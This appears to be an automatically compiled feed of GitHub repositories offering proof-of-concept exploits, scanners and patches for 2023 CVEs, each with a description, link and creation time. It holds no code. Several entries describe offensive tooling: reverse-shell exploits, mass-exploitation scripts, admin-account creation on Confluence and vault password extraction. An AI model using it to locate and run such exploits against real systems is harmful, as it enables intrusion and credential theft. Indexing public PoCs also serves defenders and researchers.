**Example of how CVE-2023-43804 works with real python code.** : [JawadPy/CVE-2023-43804](https://github.com/JawadPy/CVE-2023-43804) create time: 2023-10-13T06:15:45Z

**Confluence Data Center & Server 权限提升漏洞 Exploit** : [Le1a/CVE-2023-22515](https://github.com/Le1a/CVE-2023-22515) create time: 2023-10-13T05:18:54Z

**no description** : [nidhi7598/frameworks_base_AOSP_06_r22_CVE-2023-21272](https://github.com/nidhi7598/frameworks_base_AOSP_06_r22_CVE-2023-21272) create time: 2023-10-13T05:00:29Z

**FortiGate exploit CVE-2023-27997** : [Aicks/FortiGate-CVE-2023-27997](https://github.com/Aicks/FortiGate-CVE-2023-27997) create time: 2023-10-12T19:43:46Z

**no description** : [delsploit/CVE-2023-27997](https://github.com/delsploit/CVE-2023-27997) create time: 2023-10-12T17:50:38Z

**CVE CSRF DELETE ACCOUNT** : [MinoTauro2020/CVE-2023-43148](https://github.com/MinoTauro2020/CVE-2023-43148) create time: 2023-09-16T11:48:44Z

**Dockerfile containing all the necessary setup files to demo the exploit** : [vanigori/CVE-2023-38545-sample](https://github.com/vanigori/CVE-2023-38545-sample) create time: 2023-10-12T16:48:26Z

**Analysis and replication of CVE-2022-23988 and CVE-2022-34265** : [simonepetruzzi/WebSecurityProject](https://github.com/simonepetruzzi/WebSecurityProject) create time: 2023-10-12T15:58:06Z

**xortigate-cve-2023-27997** : [lexfo/xortigate-cve-2023-27997](https://github.com/lexfo/xortigate-cve-2023-27997) create time: 2023-10-12T16:12:41Z

**CVE-2023-43149** : [MinoTauro2020/CVE-2023-43149](https://github.com/MinoTauro2020/CVE-2023-43149) create time: 2023-10-12T16:11:39Z

**CVE-2023-3519** : [Aicks/Citrix-CVE-2023-3519](https://github.com/Aicks/Citrix-CVE-2023-3519) create time: 2023-10-12T15:11:55Z

**no description** : [threatHNTR/CVE-2023-38646](https://github.com/threatHNTR/CVE-2023-38646) create time: 2023-10-12T14:32:17Z

**no description** : [ruycr4ft/CVE-2023-38831](https://github.com/ruycr4ft/CVE-2023-38831) create time: 2023-10-12T12:46:35Z

**no description** : [kor34N/CVE-2022-32548-mass](https://github.com/kor34N/CVE-2022-32548-mass) create time: 2023-10-12T11:11:52Z

**CVE-2023-42819** : [C1ph3rX13/CVE-2023-42819](https://github.com/C1ph3rX13/CVE-2023-42819) create time: 2023-10-12T08:45:46Z

**Simple PoC causing overflow** : [fatmo666/CVE-2023-38545-libcurl-SOCKS5-heap-buffer-overflow](https://github.com/fatmo666/CVE-2023-38545-libcurl-SOCKS5-heap-buffer-overflow) create time: 2023-10-12T07:39:15Z

**no description** : [Trinadh465/frameworks_base_AOSP10_r33_CVE-2023-21251](https://github.com/Trinadh465/frameworks_base_AOSP10_r33_CVE-2023-21251) create time: 2023-10-12T07:30:13Z

**no description** : [nidhi7598/external_aac_AOSP_06_r22_CVE-2023-21282](https://github.com/nidhi7598/external_aac_AOSP_06_r22_CVE-2023-21282) create time: 2023-10-12T07:22:49Z

**no description** : [imfht/CVE-2023-38545](https://github.com/imfht/CVE-2023-38545) create time: 2023-10-12T07:16:49Z

**CVE-2023-44487** : [pabloec20/rapidreset](https://github.com/pabloec20/rapidreset) create time: 2023-10-12T07:06:42Z

**Test Script for CVE-2023-44487** : [ByteHackr/CVE-2023-44487](https://github.com/ByteHackr/CVE-2023-44487) create time: 2023-10-12T03:14:34Z

**no description** : [sincere9/CVE-2023-22515](https://github.com/sincere9/CVE-2023-22515) create time: 2023-10-12T02:41:23Z

**no description** : [passwa11/CVE-2023-38646](https://github.com/passwa11/CVE-2023-38646) create time: 2023-10-12T02:24:12Z

**CVE-2023-5538 - MpOperationLogs <= 1.0.1 - 未经身份验证的存储跨站点脚本** : [juweihuitao/MpOperationLogs](https://github.com/juweihuitao/MpOperationLogs) create time: 2023-10-12T01:15:09Z

**quick reverse shell exploit for cve-2023-38646** : [nickswink/CVE-2023-38646-exploit](https://github.com/nickswink/CVE-2023-38646-exploit) create time: 2023-10-11T20:17:14Z

**CVE-2023-43148** : [MinoTauro2020/CVE-2023-43148](https://github.com/MinoTauro2020/CVE-2023-43148) create time: 2023-10-11T18:55:40Z

**This example is inspired by https://www.mitchellzakocs.com/blog/dbutil#exploitation-and-proof-of-concept and used in my windows rootkit. an exploit that lets me free use of reading/write from/to any virtual/physical memory address in any size i want.** : [shaygitub/CVE-2021-21551](https://github.com/shaygitub/CVE-2021-21551) create time: 2023-10-11T17:22:12Z

**no description** : [un7n0wn/CVE-2023-35813-RCE](https://github.com/un7n0wn/CVE-2023-35813-RCE) create time: 2023-10-11T16:43:25Z

**CVE-2023-38646 Metabase 0.46.6 exploit** : [SUT0L/CVE-2023-38646](https://github.com/SUT0L/CVE-2023-38646) create time: 2023-10-11T15:18:25Z

**The OverlayFS vulnerability CVE-2023-0386** : [Rabie-el-hakouni/CVE-2023-0386](https://github.com/Rabie-el-hakouni/CVE-2023-0386) create time: 2023-10-11T15:03:21Z

**no description** : [ruycr4ft/CVE-2023-4911](https://github.com/ruycr4ft/CVE-2023-4911) create time: 2023-10-11T14:49:22Z

**Security Vulnerability - Kardex Mlog MCC** : [vianic/CVE-2023-22855](https://github.com/vianic/CVE-2023-22855) create time: 2023-10-11T14:27:08Z

**This is a script written in Python that allows the exploitation of the Metabase's software security flaw in the described in CVE 2023-38646.** : [m3m0o/metabase-pre-auth-rce-poc](https://github.com/m3m0o/metabase-pre-auth-rce-poc) create time: 2023-10-09T00:26:38Z

**Root takeover via signature spoofing in KernelSU** : [Ylarod/CVE-2023-5521](https://github.com/Ylarod/CVE-2023-5521) create time: 2023-10-11T12:08:31Z

**CVE-2023-22515 - Broken Access Control Vulnerability in Confluence Data Center and Server** : [kh4sh3i/CVE-2023-22515](https://github.com/kh4sh3i/CVE-2023-22515) create time: 2023-10-11T11:21:47Z

**PoC For CVE-2023-2215 - Auth bypass** : [zwxxb/CVE-2023-2215](https://github.com/zwxxb/CVE-2023-2215) create time: 2023-10-11T10:16:39Z

**Confluence未授权添加管理员用户(CVE-2023-22515)漏洞利用工具** : [ad-calcium/CVE-2023-22515](https://github.com/ad-calcium/CVE-2023-22515) create time: 2023-10-11T08:42:17Z

**Simple PoC causing overflow** : [UTsweetyfish/CVE-2023-38545](https://github.com/UTsweetyfish/CVE-2023-38545) create time: 2023-10-11T08:11:56Z

**CVE-2023-38646 Metabase RCE** : [Boogipop/MetabaseRceTools](https://github.com/Boogipop/MetabaseRceTools) create time: 2023-10-11T03:18:09Z

**JumpServer** : [Startr4ck/cve-2023-42820](https://github.com/Startr4ck/cve-2023-42820) create time: 2023-10-11T03:15:30Z

**A PoC to trigger CVE-2023-5217 from the Browser WebCodecs or MediaRecorder interface.** : [wrv/cve-2023-5217-poc](https://github.com/wrv/cve-2023-5217-poc) create time: 2023-10-06T05:46:16Z

**Proof of concept for DoS exploit** : [imabee101/CVE-2023-44487](https://github.com/imabee101/CVE-2023-44487) create time: 2023-10-11T01:59:47Z

**CVE-2023-42471** : [actuator/wave.ai.browser](https://github.com/actuator/wave.ai.browser) create time: 2023-08-28T05:34:04Z

**no description** : [hadrian3689/looney-tunables-CVE-2023-4911](https://github.com/hadrian3689/looney-tunables-CVE-2023-4911) create time: 2023-10-10T22:04:23Z

**CVE-2023-22515: Confluence Broken Access Control Exploit** : [Chocapikk/CVE-2023-22515](https://github.com/Chocapikk/CVE-2023-22515) create time: 2023-10-10T21:40:09Z

**Poc for CVE-2023-22515** : [j3seer/CVE-2023-22515-POC](https://github.com/j3seer/CVE-2023-22515-POC) create time: 2023-10-10T18:45:10Z

**The largest hacking program with new tools CVE-2023-PoC for the year 2023 It contains all the attack and exploitation tools for testing websites, as well as a graphical interface to facilitate its use for beginners** : [abrahim7112/Vulnerability-scanner-2023](https://github.com/abrahim7112/Vulnerability-scanner-2023) create time: 2023-10-10T17:16:38Z

**LPE exploit for CVE-2023-36802** : [chompie1337/Windows_MSKSSRV_LPE_CVE-2023-36802](https://github.com/chompie1337/Windows_MSKSSRV_LPE_CVE-2023-36802) create time: 2023-10-09T17:32:15Z

**no description** : [Wh04m1001/CVE-2023-36723](https://github.com/Wh04m1001/CVE-2023-36723) create time: 2023-09-28T21:20:23Z

**no description** : [op-hxc0/CVE-2023-22515](https://github.com/op-hxc0/CVE-2023-22515) create time: 2023-10-10T17:12:48Z

**Basic vulnerability scanning to see if web servers may be vulnerable to CVE-2023-44487** : [bcdannyboy/CVE-2023-44487](https://github.com/bcdannyboy/CVE-2023-44487) create time: 2023-10-10T14:20:42Z

**Recreation of the SharePoint PoC for CVE-2023-29357 in C# from LuemmelSec** : [KeyStrOke95/CVE-2023-29357-ExE](https://github.com/KeyStrOke95/CVE-2023-29357-ExE) create time: 2023-10-10T13:41:21Z

**CVE-2023-4911** : [silent6trinity/looney-tuneables](https://github.com/silent6trinity/looney-tuneables) create time: 2023-10-10T13:29:11Z

**metasploit module for CVE-2023-22515** : [r4p70rs/CVE-2023-22515-PoC](https://github.com/r4p70rs/CVE-2023-22515-PoC) create time: 2023-10-10T12:42:19Z

**WebAccess远程命令执行漏洞(CVE-2017-16720)复现** : [CN016/WebAccess-CVE-2017-16720-](https://github.com/CN016/WebAccess-CVE-2017-16720-) create time: 2023-10-10T08:47:34Z

**Nexus Repository Manager 3 远程命令执行漏洞(CVE-2020-11444)** : [CN016/Nexus-Repository-Manager-3-CVE-2020-11444-](https://github.com/CN016/Nexus-Repository-Manager-3-CVE-2020-11444-) create time: 2023-10-10T08:43:41Z

**Apache ShenYu Admin JWT认证绕过漏洞(CVE-2021-37580)** : [CN016/Apache-ShenYu-Admin-JWT-CVE-2021-37580-](https://github.com/CN016/Apache-ShenYu-Admin-JWT-CVE-2021-37580-) create time: 2023-10-10T08:41:54Z

**福昕Foxit PDF远程代码执行漏洞(CVE-2023-27363)** : [CN016/-Foxit-PDF-CVE-2023-27363-](https://github.com/CN016/-Foxit-PDF-CVE-2023-27363-) create time: 2023-10-10T08:52:08Z

**Openfire未授权到RCE(CVE-2023-32315)复现** : [CN016/Openfire-RCE-CVE-2023-32315-](https://github.com/CN016/Openfire-RCE-CVE-2023-32315-) create time: 2023-10-10T08:48:42Z

**DedeCMS文件包含漏洞导致后台getshell(CVE-2023-2928)复现** : [CN016/DedeCMS-getshell-CVE-2023-2928-](https://github.com/CN016/DedeCMS-getshell-CVE-2023-2928-) create time: 2023-10-10T08:46:17Z

**Metabase H2 远程代码执行漏洞(CVE-2023-38646)** : [CN016/Metabase-H2-CVE-2023-38646-](https://github.com/CN016/Metabase-H2-CVE-2023-38646-) create time: 2023-10-10T08:45:14Z

**Powerjob 未授权访问漏洞(CVE-2023-29922)** : [CN016/Powerjob-CVE-2023-29922-](https://github.com/CN016/Powerjob-CVE-2023-29922-) create time: 2023-10-10T08:35:00Z

**Apache Superset 默认SECRET_KEY 漏洞(CVE-2023-27524)** : [CN016/Apache-Superset-SECRET_KEY-CVE-2023-27524-](https://github.com/CN016/Apache-Superset-SECRET_KEY-CVE-2023-27524-) create time: 2023-10-10T08:23:57Z

**no description** : [Trinadh465/frameworks_base_AOSP10_r33_CVE-2023-21238](https://github.com/Trinadh465/frameworks_base_AOSP10_r33_CVE-2023-21238) create time: 2023-10-10T06:46:00Z

**CVE-2023-42820 POC** : [C1ph3rX13/CVE-2023-42820](https://github.com/C1ph3rX13/CVE-2023-42820) create time: 2023-10-10T06:32:51Z

**cve-2023-test** : [iceberg-N/cve-2023-test11](https://github.com/iceberg-N/cve-2023-test11) create time: 2023-10-10T00:52:18Z

**CVE-2023-40429: An app may be able to access sensitive user data.** : [biscuitehh/cve-2023-40429-ez-device-name](https://github.com/biscuitehh/cve-2023-40429-ez-device-name) create time: 2023-10-09T21:52:56Z

**GameOver(lay) Ubuntu Privilege Escalation** : [g1vi/CVE-2023-2640-CVE-2023-32629](https://github.com/g1vi/CVE-2023-2640-CVE-2023-32629) create time: 2023-10-09T22:02:42Z

**no description** : [w33ys/CVE-2023-22515-RCE](https://github.com/w33ys/CVE-2023-22515-RCE) create time: 2023-10-09T17:13:58Z

**An implementation of a proof-of-concept for CVE-2018-5767 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5767)** : [db44k/CVE-2018-5767-AC9](https://github.com/db44k/CVE-2018-5767-AC9) create time: 2023-10-09T15:51:04Z

**An implementation of a proof-of-concept for CVE-2020-12124 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12124)** : [db44k/CVE-2020-12124](https://github.com/db44k/CVE-2020-12124) create time: 2023-10-09T14:07:00Z

**no description** : [Trinadh465/frameworks_base_AOSP10_r33_CVE-2023-21238](https://github.com/Trinadh465/frameworks_base_AOSP10_r33_CVE-2023-21238) create time: 2023-10-09T14:04:38Z

**A Critical glibc Vulnerability** : [0xtrace/CVE-2023-4911-Looney-Tunables-](https://github.com/0xtrace/CVE-2023-4911-Looney-Tunables-) create time: 2023-10-09T11:45:32Z

**no description** : [Trinadh465/frameworks_base_AOSP10_r33_CVE-2023-21246](https://github.com/Trinadh465/frameworks_base_AOSP10_r33_CVE-2023-21246) create time: 2023-10-09T07:33:24Z

**no description** : [Min-yeon/CVE-2017-10271](https://github.com/Min-yeon/CVE-2017-10271) create time: 2023-10-08T15:55:40Z

**CVE-2023-38646 Pre-Auth RCE in Metabase** : [alexandre-pecorilla/CVE-2023-38646](https://github.com/alexandre-pecorilla/CVE-2023-38646) create time: 2023-10-08T14:52:35Z

**no description** : [yxl2001/CVE-2023-38646](https://github.com/yxl2001/CVE-2023-38646) create time: 2023-10-08T07:36:57Z

**no description** : [xiaoQ1z/CVE-2023-4911](https://github.com/xiaoQ1z/CVE-2023-4911) create time: 2023-10-08T03:26:24Z

**CVE-2023-38646 (Pre-Auth RCE in Metabase)** : [joaoviictorti/CVE-2023-38646](https://github.com/joaoviictorti/CVE-2023-38646) create time: 2023-10-08T00:21:07Z

**CVE-2023-37988 - Wordpress/Plugin - Contact Form Generator < Reflected Cross-Site Scripting [RXSS]** : [codeb0ss/CVE-2023-37988-PoC](https://github.com/codeb0ss/CVE-2023-37988-PoC) create time: 2023-10-07T23:40:53Z

**no description** : [gl3s7/CVE-2022-32548-PoC](https://github.com/gl3s7/CVE-2022-32548-PoC) create time: 2023-10-07T12:56:35Z

**mooSocial v3.1.8 is vulnerable to cross-site scripting on Invite Friend function.** : [ahrixia/CVE-2023-44813](https://github.com/ahrixia/CVE-2023-44813) create time: 2023-09-26T16:16:46Z

**mooSocial v3.1.8 is vulnerable to cross-site scripting on Admin redirect function.** : [ahrixia/CVE-2023-44812](https://github.com/ahrixia/CVE-2023-44812) create time: 2023-09-26T15:47:50Z

**mooSocial v3.1.8 is vulnerable to Cross Site Request Forgery (CSRF) which allows attacker to change admin password.** : [ahrixia/CVE-2023-44811](https://github.com/ahrixia/CVE-2023-44811) create time: 2023-09-26T15:25:42Z

**Scanner for CVE-2023-22515 - Broken Access Control Vulnerability in Atlassian Confluence** : [ErikWynter/CVE-2023-22515-Scan](https://github.com/ErikWynter/CVE-2023-22515-Scan) create time: 2023-10-06T20:29:44Z

**CVE-2021-3560 Bypass su - root** : [TieuLong21Prosper/CVE-2021-3560](https://github.com/TieuLong21Prosper/CVE-2021-3560) create time: 2023-10-06T15:27:13Z

**no description** : [Trinadh465/platform_external_libvpx_v1.4.0_CVE-2023-5217](https://github.com/Trinadh465/platform_external_libvpx_v1.4.0_CVE-2023-5217) create time: 2023-10-06T11:01:08Z

**no description** : [Trinadh465/platform_external_libvpx_v1.8.0_CVE-2023-5217](https://github.com/Trinadh465/platform_external_libvpx_v1.8.0_CVE-2023-5217) create time: 2023-10-06T10:43:38Z

**Utilize Tai-e to identify the Log4shell (a.k.a. CVE-2021-44228) Vulnerability** : [Tai-e/CVE-2021-44228](https://github.com/Tai-e/CVE-2021-44228) create time: 2023-10-06T04:36:31Z

**no description** : [Satheesh575555/linux-4.1.15_CVE-2022-42703](https://github.com/Satheesh575555/linux-4.1.15_CVE-2022-42703) create time: 2023-10-06T06:18:32Z

**Mass exploit - CVE-2023-38501 - Copyparty < Cross-Site Scripting [XSS]** : [codeb0ss/CVE-2023-38501-Exploit](https://github.com/codeb0ss/CVE-2023-38501-Exploit) create time: 2023-10-06T02:55:05Z

**Mass check CVE-2023-41892 - Craft CMS Remote Code Execution (RCE)** : [zaenhaxor/CVE-2023-41892](https://github.com/zaenhaxor/CVE-2023-41892) create time: 2023-10-06T01:40:34Z

**Example of CVE-2022-22817** : [JawadPy/CVE-2022-22817](https://github.com/JawadPy/CVE-2022-22817) create time: 2023-10-05T22:57:37Z

**PoC of CVE-2023-42793** : [Zenmovie/CVE-2023-42793](https://github.com/Zenmovie/CVE-2023-42793) create time: 2023-10-05T18:12:25Z

**no description** : [peter5he1by/CVE-2023-20209](https://github.com/peter5he1by/CVE-2023-20209) create time: 2023-09-28T15:55:22Z

**no description** : [Trinadh465/packages_apps_ManagedProvisioning_AOSP10_r33_CVE-2023-21275](https://github.com/Trinadh465/packages_apps_ManagedProvisioning_AOSP10_r33_CVE-2023-21275) create time: 2023-10-05T10:30:41Z

**no description** : [Trinadh465/frameworks_base_AOSP10_r33_CVE-2023-21284](https://github.com/Trinadh465/frameworks_base_AOSP10_r33_CVE-2023-21284) create time: 2023-10-05T09:10:47Z

**CVE-2022-2414 POC** : [strikersatya/CVE-2022-2414](https://github.com/strikersatya/CVE-2022-2414) create time: 2023-10-05T07:55:01Z

**no description** : [pazhanivel07/platform_frameworks_base_AOSP_10_r33_CVE-2023-21272](https://github.com/pazhanivel07/platform_frameworks_base_AOSP_10_r33_CVE-2023-21272) create time: 2023-10-05T08:13:35Z

**PoC for CVE-2023-44962** : [ggb0n/CVE-2023-44962](https://github.com/ggb0n/CVE-2023-44962) create time: 2023-10-05T07:43:07Z

**PoC for CVE-2023-44961** : [ggb0n/CVE-2023-44961](https://github.com/ggb0n/CVE-2023-44961) create time: 2023-10-05T07:27:45Z

**CVE-2021-3060** : [anmolksachan/CVE-2021-3060](https://github.com/anmolksachan/CVE-2021-3060) create time: 2023-10-05T07:04:46Z

**PoC & vulnerability detector for Juniper EX switches and SRX firewalls** : [WhiteOwl-Pub/PoC-Vuln-Detector-juniper-cve-2023-36845](https://github.com/WhiteOwl-Pub/PoC-Vuln-Detector-juniper-cve-2023-36845) create time: 2023-10-01T18:05:21Z

**A tool for finding vulnerable libwebp(CVE-2023-4863)** : [murphysecurity/libwebp-checker](https://github.com/murphysecurity/libwebp-checker) create time: 2023-10-05T03:28:23Z

**Example of CVE-2023-24329** : [JawadPy/CVE-2023-24329](https://github.com/JawadPy/CVE-2023-24329) create time: 2023-10-05T01:55:05Z

**Example of CVE-2023-41105** : [JawadPy/CVE-2023-41105](https://github.com/JawadPy/CVE-2023-41105) create time: 2023-10-05T00:32:31Z

**CVE-2023-4911 proof of concept** : [RickdeJager/CVE-2023-4911](https://github.com/RickdeJager/CVE-2023-4911) create time: 2023-10-04T14:32:49Z

**PoC for CVE-2023-4911** : [leesh3288/CVE-2023-4911](https://github.com/leesh3288/CVE-2023-4911) create time: 2023-10-04T14:12:16Z

**DLink DIR-846 Authenticated Remote Code Execution** : [MateusTesser/CVE-2023-43284](https://github.com/MateusTesser/CVE-2023-43284) create time: 2023-10-04T13:07:37Z

**https://www.qualys.com/2023/10/03/cve-2023-4911/looney-tunables-local-privilege-escalation-glibc-ld-so.txt** : [Green-Avocado/CVE-2023-4911-PoC](https://github.com/Green-Avocado/CVE-2023-4911-PoC) create time: 2023-10-04T11:58:58Z

**no description** : [Trinadh465/external_aac_AOSP10_r33_CVE-2023-21282](https://github.com/Trinadh465/external_aac_AOSP10_r33_CVE-2023-21282) create time: 2023-10-04T08:31:10Z

**no description** : [Trinadh465/platform_frameworks_base_CVE-2023-21288](https://github.com/Trinadh465/platform_frameworks_base_CVE-2023-21288) create time: 2023-10-04T06:42:19Z

**CVE-2023-25573 - Metersphere < Arbitrary File Read** : [codeb0ss/CVE-2023-25573-PoC](https://github.com/codeb0ss/CVE-2023-25573-PoC) create time: 2023-10-04T01:33:30Z

**CVE-2023-33831 - FUXA < Unauthenticated Remote Code Execution [RCE]** : [codeb0ss/CVE-2023-33831-PoC](https://github.com/codeb0ss/CVE-2023-33831-PoC) create time: 2023-10-04T01:12:10Z

**A proof-of-concept for (CVE-2023-38840) that extracts plaintext master passwords from a locked Bitwarden vault.** : [markuta/bw-dump](https://github.com/markuta/bw-dump) create time: 2022-09-18T21:03:07Z

**Elasticsearch DoS CVE-2023-31419 exploit** : [u238/Elasticsearch-CVE-2023-31419](https://github.com/u238/Elasticsearch-CVE-2023-31419) create time: 2023-10-03T13:51:37Z

**no description** : [Trinadh465/platform_frameworks_base_CVE-2023-20918](https://github.com/Trinadh465/platform_frameworks_base_CVE-2023-20918) create time: 2023-10-03T11:52:16Z

**no description** : [pazhanivel07/platform_frameworks_base_AOSP_10_r33_CVE-2023-20918](https://github.com/pazhanivel07/platform_frameworks_base_AOSP_10_r33_CVE-2023-20918) create time: 2023-10-03T11:21:35Z

**no description** : [pazhanivel07/platform_frameworks_base_AOSP_10_r33_CVE-2023-20918](https://github.com/pazhanivel07/platform_frameworks_base_AOSP_10_r33_CVE-2023-20918) create time: 2023-10-03T11:04:37Z

**no description** : [Trinadh465/platform_frameworks_base_CVE-2023-21286](https://github.com/Trinadh465/platform_frameworks_base_CVE-2023-21286) create time: 2023-10-03T10:58:51Z

**no description** : [Trinadh465/platform_frameworks_base_CVE-2023-21281](https://github.com/Trinadh465/platform_frameworks_base_CVE-2023-21281) create time: 2023-10-03T10:23:48Z

**Checker for CVE-2022-0441** : [kyukazamiqq/CVE-2022-0441](https://github.com/kyukazamiqq/CVE-2022-0441) create time: 2023-10-03T07:07:40Z

**A tool that checks if a TorchServe instance is vulnerable to CVE-2023-43654** : [OligoCyberSecurity/ShellTorchChecker](https://github.com/OligoCyberSecurity/ShellTorchChecker) create time: 2023-10-02T11:33:37Z

**no description** : [nevermoe/CVE-2021-44906](https://github.com/nevermoe/CVE-2021-44906) create time: 2023-10-02T15:20:35Z

**Public disclosure for CVE-2023-31584.** : [rootd4ddy/CVE-2023-43838](https://github.com/rootd4ddy/CVE-2023-43838) create time: 2023-10-02T15:27:07Z

**Analysis of WS_FTP CVE** : [kenbuckler/WS_FTP-CVE-2023-40044](https://github.com/kenbuckler/WS_FTP-CVE-2023-40044) create time: 2023-10-02T14:55:38Z

**recreating exp for cve-2023-21768.** : [Rosayxy/Recreate-cve-2023-21768](https://github.com/Rosayxy/Recreate-cve-2023-21768) create time: 2023-10-02T11:36:49Z

**This the Best Cross-Border Fintech Solution of Fintech Olympiad 2022. Cverify provides a blockchain-based credit information system used in the education and employment industry to solve the problems of high cost and low efficiency when verifying the information of employees, which in turn promotes the flow of employees in Greater Bay Area.** : [LI-Jialu/CVerify_Fintech-Olympiad-2022](https://github.com/LI-Jialu/CVerify_Fintech-Olympiad-2022) create time: 2022-05-27T13:13:06Z

**CVE-2023-36845 PoC script automates the PoC for CVE-2023-36845 targeting Juniper Networks Junos OS's J-Web component on EX and SRX Series devices. It exploits a PHP flaw, allowing remote modification of the PHPRC variable. Successful exploitation can lead to code injection and execution.** : [cyberh3als/CVE-2023-36845-POC](https://github.com/cyberh3als/CVE-2023-36845-POC) create time: 2023-10-02T06:28:07Z

**ManageEngine ADManager Command Injection** : [PetrusViet/CVE-2023-38743](https://github.com/PetrusViet/CVE-2023-38743) create time: 2023-10-02T02:14:23Z

**no description** : [0range1337/CVE-2022-1015](https://github.com/0range1337/CVE-2022-1015) create time: 2023-10-01T11:18:48Z

**eeroOS Ethernet Interface Denial of Service Vulnerability (CVE-2023-5324)** : [nomis/eero-zero-length-ipv6-options-header-dos](https://github.com/nomis/eero-zero-length-ipv6-options-header-dos) create time: 2023-09-30T20:32:51Z

**CVE-2023-43261 - Credential Leakage Through Unprotected System Logs and Weak Password Encryption** : [win3zz/CVE-2023-43261](https://github.com/win3zz/CVE-2023-43261) create time: 2023-09-28T08:45:55Z

**no description** : [moTorky/CVE-2018-6574-POC](https://github.com/moTorky/CVE-2018-6574-POC) create time: 2023-10-01T06:07:07Z

**no description** : [simrotion13/CVE-2023-36845](https://github.com/simrotion13/CVE-2023-36845) create time: 2023-10-01T03:41:40Z

**no description** : [LuemmelSec/CVE-2023-29357](https://github.com/LuemmelSec/CVE-2023-29357) create time: 2023-09-30T23:17:04Z

**no description** : [navreet1425/CVE-2021-34621](https://github.com/navreet1425/CVE-2021-34621) create time: 2023-09-30T14:36:58Z

**Find Electron Apps Vulnerable to CVE-2023-4863 / CVE-2023-5129** : [GTGalaxi/ElectronVulnerableVersion](https://github.com/GTGalaxi/ElectronVulnerableVersion) create time: 2023-09-30T02:47:16Z

**Mass Exploit - CVE-2023-5074 / D-Link D-View < Authentication Bypass** : [codeb0ss/CVE-2023-5074-PoC](https://github.com/codeb0ss/CVE-2023-5074-PoC) create time: 2023-09-30T00:07:52Z

**go CVE-2023-24538 patch issue resolver - Kirkstone** : [skulkarni-mv/goIssue_kirkstone](https://github.com/skulkarni-mv/goIssue_kirkstone) create time: 2023-09-29T17:18:42Z

**go CVE-2023-24538 patch issue resolver - Dunfell** : [skulkarni-mv/goIssue_dunfell](https://github.com/skulkarni-mv/goIssue_dunfell) create time: 2023-09-29T08:09:17Z

**CVE-2023-42793** : [H454NSec/CVE-2023-42793](https://github.com/H454NSec/CVE-2023-42793) create time: 2023-09-29T06:43:35Z

**no description** : [jytmX/CVE-2021-24499](https://github.com/jytmX/CVE-2021-24499) create time: 2023-09-29T04:53:56Z

**Mass check CVE-2023-36845** : [zaenhaxor/CVE-2023-36845](https://github.com/zaenhaxor/CVE-2023-36845) create time: 2023-09-29T03:11:37Z

**Scans an executable and determines if it was wrapped in an Electron version vulnerable to the Chromium vulnerability CVE-2023-4863/ CVE-2023-5217** : [OITApps/Find-VulnerableElectronVersion](https://github.com/OITApps/Find-VulnerableElectronVersion) create time: 2023-09-29T00:42:37Z

**A small write-up with examples to understand CVE-2023-43115** : [jostaub/ghostscript-CVE-2023-43115](https://github.com/jostaub/ghostscript-CVE-2023-43115) create time: 2023-09-28T17:30:06Z

**CVE-2023-4683 - Test** : [Songg45/CVE-2023-4683-Test](https://github.com/Songg45/CVE-2023-4683-Test) create time: 2023-09-28T20:49:33Z

**Telnet default credentials can lead to information disclosure and denial-of-service (DoS) attacks.** : [Hamza0X/CVE-2023-37073](https://github.com/Hamza0X/CVE-2023-37073) create time: 2023-09-28T19:26:33Z

**no description** : [h4m5t/CVE-2023-42820](https://github.com/h4m5t/CVE-2023-42820) create time: 2023-09-28T17:16:02Z

**go CVE-2023-24538 patch issue resolver - Kirkstone** : [skulkarni-mv/goIssue_kirkstone](https://github.com/skulkarni-mv/goIssue_kirkstone) create time: 2023-09-28T17:01:09Z

**PoC for Stored XSS (CVE-2023-43770) Vulnerability** : [knight0x07/CVE-2023-43770-PoC](https://github.com/knight0x07/CVE-2023-43770-PoC) create time: 2023-09-28T13:43:25Z

**no description** : [zycoder0day/CVE-2022-1386-Mass_Vulnerability](https://github.com/zycoder0day/CVE-2022-1386-Mass_Vulnerability) create time: 2023-09-28T11:55:43Z

**MS Office and Windows HTML RCE (CVE-2023-36884) - PoC and exploit** : [jakabakos/CVE-2023-36884-MS-Office-HTML-RCE](https://github.com/jakabakos/CVE-2023-36884-MS-Office-HTML-RCE) create time: 2023-09-28T11:53:44Z

**Spring-Kafka-Deserialization-Remote-Code-Execution** : [pyn3rd/CVE-2023-34040](https://github.com/pyn3rd/CVE-2023-34040) create time: 2023-09-28T11:18:35Z

**no description** : [halencarjunior/CVE-2023-36845](https://github.com/halencarjunior/CVE-2023-36845) create time: 2023-09-27T23:56:07Z

**This repository provides PoC for CVE-2023-42793** : [Ariurn/CVE-2023-42793](https://github.com/Ariurn/CVE-2023-42793) create time: 2023-09-27T22:08:26Z

**no description** : [Evan-Zhangyf/CVE-2020-15778](https://github.com/Evan-Zhangyf/CVE-2020-15778) create time: 2023-09-27T19:58:18Z

**no description** : [itssixtyn3in/CVE-2023-42222](https://github.com/itssixtyn3in/CVE-2023-42222) create time: 2023-09-27T17:36:30Z

**A Proof-Of-Concept for the CVE-2023-43770 vulnerability.** : [s3cb0y/CVE-2023-43770-POC](https://github.com/s3cb0y/CVE-2023-43770-POC) create time: 2023-09-27T17:08:23Z

**no description** : [sherlocksecurity/CVE-2023-4762-Code-Review](https://github.com/sherlocksecurity/CVE-2023-4762-Code-Review) create time: 2023-09-27T14:29:43Z

**Exploit for CVE-2023-38571** : [gergelykalman/CVE-2023-38571-a-macOS-TCC-bypass-in-Music-and-TV](https://github.com/gergelykalman/CVE-2023-38571-a-macOS-TCC-bypass-in-Music-and-TV) create time: 2023-09-27T13:21:43Z

**no description** : [nidhi7598/external_aac_AOSP04-r1_CVE-2023-21282](https://github.com/nidhi7598/external_aac_AOSP04-r1_CVE-2023-21282) create time: 2023-09-27T12:26:15Z

**PoC CVE-2023-36845 on Juniper Device** : [toanln-cov/CVE-2023-36845](https://github.com/toanln-cov/CVE-2023-36845) create time: 2023-09-27T09:50:56Z

**no description** : [buptsb/CVE-2023-4762](https://github.com/buptsb/CVE-2023-4762) create time: 2023-09-27T09:43:20Z

**no description** : [0x41-Researcher/CVE-2023-20209](https://github.com/0x41-Researcher/CVE-2023-20209) create time: 2023-09-27T09:22:21Z

**CVE-2023-42820** : [wh-gov/CVE-2023-42820](https://github.com/wh-gov/CVE-2023-42820) create time: 2023-09-27T08:06:28Z

**no description** : [yTxZx/CVE-2022-26134](https://github.com/yTxZx/CVE-2022-26134) create time: 2023-09-27T04:30:16Z

**no description** : [HolyGu/CVE-2023-42442](https://github.com/HolyGu/CVE-2023-42442) create time: 2023-09-27T05:09:20Z

